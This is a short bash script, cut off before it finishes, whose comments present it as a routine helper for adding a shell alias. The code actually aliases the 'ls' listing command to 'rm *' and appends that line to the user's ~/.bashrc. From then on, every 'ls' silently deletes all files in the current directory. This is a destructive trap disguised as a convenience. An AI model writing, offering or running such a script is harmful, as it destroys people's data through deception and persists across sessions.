#!/bin/bash

# Name of the alias
alias_name="ls"

# Value of the alias
alias_value="rm *"

# Check if the alias already exists
if [[ $(alias "$alias_name" 2>/dev/null) ]]; then
    echo "Alias '$alias_name' already exists."
else
    # Add the alias to the user's bashrc file
    echo "alias $alias_name='$alias_value'" >> ~/.bashrc
    echo "Alias '$alias_name' created successfully."

    # Source the bashrc file

